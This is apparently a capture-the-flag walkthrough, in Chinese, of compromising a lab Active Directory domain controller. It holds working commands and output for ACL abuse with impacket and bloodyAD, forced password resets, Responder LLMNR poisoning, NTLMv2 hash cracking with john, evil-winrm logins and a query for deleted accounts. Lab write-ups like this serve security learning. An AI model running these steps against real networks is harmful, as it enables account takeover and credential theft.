默认的用户凭证

username: mark

password: suP3rPa$sw0rd2026!&

Nmap

[/home/kali/temp]$ nmap 192.168.56.100 -A -p- 

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-07-13 12:20:55Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL0., Site: Default-First-Site-Name)
|_ssl-date: 2026-07-13T12:22:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after:  2027-02-21T23:24:38
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL0., Site: Default-First-Site-Name)
|_ssl-date: 2026-07-13T12:22:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after:  2027-02-21T23:24:38
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after:  2027-02-21T23:24:38
|_ssl-date: 2026-07-13T12:22:27+00:00; 0s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL0., Site: Default-First-Site-Name)
|_ssl-date: 2026-07-13T12:22:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after:  2027-02-21T23:24:38
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
57796/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
57797/tcp open  msrpc         Microsoft Windows RPC
57808/tcp open  msrpc         Microsoft Windows RPC
57817/tcp open  msrpc         Microsoft Windows RPC
57831/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:B2:9C:C3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-07-13T12:21:47
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b2:9c:c3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.56.100

修改 /etc/hosts 如下

[/home/kali/temp]$ cat /etc/hosts                                                          
127.0.0.1       localhost
127.0.1.1       Hacking
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters


192.168.56.100 PHANTOM.THL DC01.PHANTOM.THL

UserEnum

[/home/kali/temp]$ crackmapexec smb 192.168.56.100 -u mark -p 'suP3rPa$sw0rd2026!&' --users 
SMB         192.168.56.100  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:PHANTOM.THL) (signing:True) (SMBv1:False)
SMB         192.168.56.100  445    DC01             [+] PHANTOM.THL\mark:suP3rPa$sw0rd2026!& 
SMB         192.168.56.100  445    DC01             [+] Enumerated domain user(s)
SMB         192.168.56.100  445    DC01             PHANTOM.THL\LegacyAdmins                   badpwdcount: 0 desc: Legacy administrative group maintained for backward compatibility with older systems.                                                 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\robert                         badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\tomas                          badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\frank                          badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\joshua                         badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\ian                            badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\michael                        badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\ana                            badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\maria                          badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\sandra                         badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\mia                            badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\joe                            badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\bob                            badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\mark                           badpwdcount: 0 desc: 
SMB         192.168.56.100  445    DC01             PHANTOM.THL\krbtgt                         badpwdcount: 0 desc: Cuenta de servicio de centro de distribución de claves                                                                                
SMB         192.168.56.100  445    DC01             PHANTOM.THL\Invitado                       badpwdcount: 0 desc: Cuenta integrada para el acceso como invitado al equipo o dominio                                                                     
SMB         192.168.56.100  445    DC01             PHANTOM.THL\Administrador                  badpwdcount: 0 desc: Cuenta integrada para la administración del equipo o dominio                                                                          

Bloodhound

[/home/kali/temp]$ bloodhound-python -d phantom.thl -u mark -p 'suP3rPa$sw0rd2026!&' -dc dc01.phantom.thl -c All -ns 192.168.56.100 --zip 
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: phantom.thl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.phantom.thl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.phantom.thl
INFO: Found 18 users
INFO: Found 60 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.PHANTOM.THL
INFO: Done in 00M 00S
INFO: Compressing output into 20260713202940_bloodhound.zip

WriteOwner - Fullcontrol User(bob)

查看到 mark 用户可以 WriteOwnerbob 用户

[/home/kali/temp]$ impacket-owneredit -action write -new-owner 'mark' -target 'bob' 'phantom.thl/mark:suP3rPa$sw0rd2026!&'
/usr/share/doc/python3-impacket/examples/owneredit.py:87: SyntaxWarning: invalid escape sequence '\V'
  'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/owneredit.py:96: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:97: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:98: SyntaxWarning: invalid escape sequence '\I'
  'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/owneredit.py:100: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:101: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:102: SyntaxWarning: invalid escape sequence '\W'
  'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/owneredit.py:103: SyntaxWarning: invalid escape sequence '\T'
  'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:104: SyntaxWarning: invalid escape sequence '\D'
  'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:105: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:106: SyntaxWarning: invalid escape sequence '\E'
  'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/owneredit.py:107: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:108: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:109: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:110: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:111: SyntaxWarning: invalid escape sequence '\H'
  'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/owneredit.py:112: SyntaxWarning: invalid escape sequence '\A'
  'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:113: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-3580157585-956322742-780763674-1103
[*] - sAMAccountName: mark
[*] - distinguishedName: CN=Mark,CN=Users,DC=PHANTOM,DC=THL
[*] OwnerSid modified successfully!
[/home/kali/temp]$ imagetops                                                                                              
[/home/kali/temp]$ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'mark' -target 'bob' 'phantom.thl/mark:suP3rPa$sw0rd2026!&'
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
  'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
  'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
  'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
  'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
  'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
  'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
  'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
  'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20260713-203857.bak
[*] DACL modified successfully!

然后修改 bob 的密码

[/home/kali/temp]$ bloodyAD --dc 192.168.56.100 -d phantom.thl -u mark -p 'suP3rPa$sw0rd2026!&' set password bob 'Abc123456@' 
[+] Password changed successfully!

User(bob) WriteMember

再查看 bob 的权限

bob 添加到 IT 组里

[/home/kali/temp]$ bloodyAD --dc 192.168.56.100 -d phantom.thl -u bob -p 'Abc123456@' add groupMember IT bob
[+] bob added to IT

IT 组对 HELPDESK 组具有 WriteDacl 权限,将 bob 用户添加写入 HELPDESK 组用户的权限

[/home/kali/temp]$ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'bob' -target-dn 'CN=HELPDESK,CN=USERS,DC=PHANTOM,DC=THL'  'phantom.thl'/'bob:Abc123456@' 
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
  'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
  'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
  'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
  'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
  'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
  'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
  'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
  'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20260713-204430.bak
[*] DACL modified successfully!

然后添加到组里面

[/home/kali/temp]$ bloodyAD --dc 192.168.56.100 -d phantom.thl -u bob -p 'Abc123456@' add groupMember HELPDESK bob
[+] bob added to HELPDESK

ForceChangePassword - User(frank)

[/home/kali/temp]$ bloodyAD --dc 192.168.56.100 -d phantom.thl -u bob -p 'Abc123456@' set password frank 'Abc123456@'
[+] Password changed successfully!

由于 frank 在远程管理组里,并且 5985 端口开放,可以通过 evil-winrm 连接

[/home/kali/temp]$ evil-winrm -i 192.168.56.100 -u frank -p 'Abc123456@'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                                                                          
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\frank\Documents> whoami /all

INFORMACIàN DE USUARIO
----------------------

Nombre de usuario SID
================= ============================================
phantom\frank     S-1-5-21-3580157585-956322742-780763674-1113


INFORMACIàN DE GRUPO
--------------------

Nombre de grupo                                                    Tipo           SID          Atributos
================================================================== ============== ============ ========================================================================
Todos                                                              Grupo conocido S-1-1-0      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios de administraci¢n remota                          Alias          S-1-5-32-580 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios                                                   Alias          S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Acceso compatible con versiones anteriores de Windows 2000 Alias          S-1-5-32-554 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Acceso DCOM a Serv. de certif.                             Alias          S-1-5-32-574 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\NETWORK                                               Grupo conocido S-1-5-2      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados                               Grupo conocido S-1-5-11     Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compa¤¡a                                         Grupo conocido S-1-5-15     Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticaci¢n NTLM                                    Grupo conocido S-1-5-64-10  Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio alto                  Etiqueta       S-1-16-8448


INFORMACIàN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripci¢n                                  Estado
============================= ============================================ ==========
SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio     Habilitada
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido             Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada


INFORMACIàN DE NOTIFICACIONES DE USUARIO
-----------------------

Notificaciones de usuario desconocidas.

Se ha deshabilitado la compatibilidad de Kerberos para el control de acceso din mico en este dispositivo.

但没有任何有价值的东西

LLMNR Poisoning - Own User(robert)

LLMNR (Link-Local Multicast Name Resolution) 和 NBT-NS (NetBIOS Name Service) 是 Windows 系统的备用名称解析协议

有以下特点:

  • 当 DNS 解析失败时,Windows 会使用 LLMNR/NBT-NS 进行广播查询
  • 默认启用在所有 Windows 系统中(包括最新版本)
  • 不加密不认证 → 容易受到中间人攻击
[/home/kali/temp]$ responder -I eth1                  
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [eth1]
    Responder IP               [192.168.56.4]
    Responder IPv6             [fe80::d072:dc0f:641a:5714]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-QIQ7RQESICI]
    Responder Domain Name      [KZXB.LOCAL]
    Responder DCE-RPC Port     [45895]

[+] Listening for events...                                                                                                                     

[*] [NBT-NS] Poisoned answer sent to 192.168.56.100 for name PHANTOM (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.100  for name PHANTOM.LOCAL
[*] [MDNS] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM.LOCAL
[*] [LLMNR]  Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM
[*] [LLMNR]  Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM
[*] [LLMNR]  Poisoned answer sent to 192.168.56.100 for name PHANTOM
[*] [MDNS] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM.LOCAL
[*] [MDNS] Poisoned answer sent to 192.168.56.100  for name PHANTOM.LOCAL
[*] [LLMNR]  Poisoned answer sent to 192.168.56.100 for name PHANTOM
[*] [MDNS] Poisoned answer sent to 192.168.56.100  for name PHANTOM.LOCAL
[*] [LLMNR]  Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM
[*] [MDNS] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM.LOCAL
[*] [LLMNR]  Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM
[*] [LLMNR]  Poisoned answer sent to 192.168.56.100 for name PHANTOM
[*] [MDNS] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM.LOCAL
[*] [MDNS] Poisoned answer sent to 192.168.56.100  for name PHANTOM.LOCAL
[*] [LLMNR]  Poisoned answer sent to 192.168.56.100 for name PHANTOM
[SMB] NTLMv2-SSP Client   : fe80::5050:b218:7453:4129
[SMB] NTLMv2-SSP Username : PHANTOM.LOCAL\robert
[SMB] NTLMv2-SSP Hash     : robert::PHANTOM.LOCAL:b7028a60220b0948:49F4A0F32033C66558E08621AAF69477:010100000000000000EDC95D0D13DD014D44C6564B63C33C00000000020008004B005A005800420001001E00570049004E002D005100490051003700520051004500530049004300490004003400570049004E002D00510049005100370052005100450053004900430049002E004B005A00580042002E004C004F00430041004C00030014004B005A00580042002E004C004F00430041004C00050014004B005A00580042002E004C004F00430041004C000700080000EDC95D0D13DD0106000400020000000800300030000000000000000000000000300000BC501038F82BF7CB19D6AB1C65E3C254308D511DED99ED70AA72DE3B60C62EC30A001000000000000000000000000000000000000900240063006900660073002F005000480041004E0054004F004D002E004C004F00430041004C000000000000000000                                                                                                                                
[+] Exiting...

尝试爆破一下密码

[/home/kali/temp]$ john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt                
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bLink182         (robert)     
1g 0:00:00:02 DONE (2026-07-13 21:28) 0.3787g/s 3736Kp/s 3736Kc/s 3736KC/s bLueLove..b53017912
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

得到 robert 用户的密码,登录拿到 user.txt

[/home/kali/temp]$ evil-winrm -i 192.168.56.100 -u robert -p 'bLink182'                        
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robert\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\robert\desktop> dir


    Directorio: C:\Users\robert\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/22/2026   3:01 AM             33 user.txt


*Evil-WinRM* PS C:\Users\robert\desktop> 

Own User(tomas)

在目录下拿到一个留言

*Evil-WinRM* PS C:\Users\robert\Documents> type migration_notes.txt
[OK] Verify application connectivity after the ERP migration

Validate that legacy authentication is still working for internal tools

Review Active Directory group memberships (DevOps / Support)

[OK] Confirm that backup jobs are running correctly

Check access permissions on shared resources

[IMPORTANT] Remember to clean up temporary test accounts created during the migration

Remove unused scripts and obsolete configurations

[OK] Verify expiration and renewal of internal certificates

Document performed steps and lessons learned from the migration

其中重要说的是记得清除临时账户,并且删掉未用过的脚本和配置等。那么找一下被删掉的用户呢

*Evil-WinRM* PS C:\Users\robert\Documents> Get-ADObject -Filter {isDeleted -eq $true -and ObjectClass -eq "user"} -IncludeDeletedObjects -Properties * | Where-Object {$_.Name -like "*test*"} | select Name, SamAccountName, Deleted, LastKnownParent

Name                                              SamAccountName Deleted LastKnownParent
----                                              -------------- ------- ---------------
dev_test...                                       dev_test          True CN=Users,DC=PHANTOM,DC=THL

发现一个 dev_test 用户,查看他的完整信息

*Evil-WinRM* PS C:\Users\robert\Documents> Get-ADObject -Filter {isDeleted -eq $true -and ObjectClass -eq "user"} -IncludeDeletedObjects -Properties * | Where-Object {$_.Name -like "*dev_test*"} | fl *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : PHANTOM.THL/Deleted Objects/dev_test
                                  DEL:55a7bc61-fdc9-4ecc-bec5-25703d9ee855
CN                              : dev_test
                                  DEL:55a7bc61-fdc9-4ecc-bec5-25703d9ee855
codePage                        : 0
countryCode                     : 0
Created                         : 2/21/2026 6:09:48 PM
createTimeStamp                 : 2/21/2026 6:09:48 PM
Deleted                         : True
Description                     : f6Y%UPa6ZB9eR5wG9$an
DisplayName                     : dev_test
DistinguishedName               : CN=dev_test\0ADEL:55a7bc61-fdc9-4ecc-bec5-25703d9ee855,CN=Deleted Objects,DC=PHANTOM,DC=THL
dSCorePropagationData           : {2/21/2026 8:23:32 PM, 1/1/1601 1:00:04 AM}
givenName                       : dev_test
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : CN=Users,DC=PHANTOM,DC=THL
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 2/21/2026 7:16:40 PM
modifyTimeStamp                 : 2/21/2026 7:16:40 PM
msDS-LastKnownRDN               : dev_test
Name                            : dev_test
                                  DEL:55a7bc61-fdc9-4ecc-bec5-25703d9ee855
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : 55a7bc61-fdc9-4ecc-bec5-25703d9ee855
objectSid                       : S-1-5-21-3580157585-956322742-780763674-1114
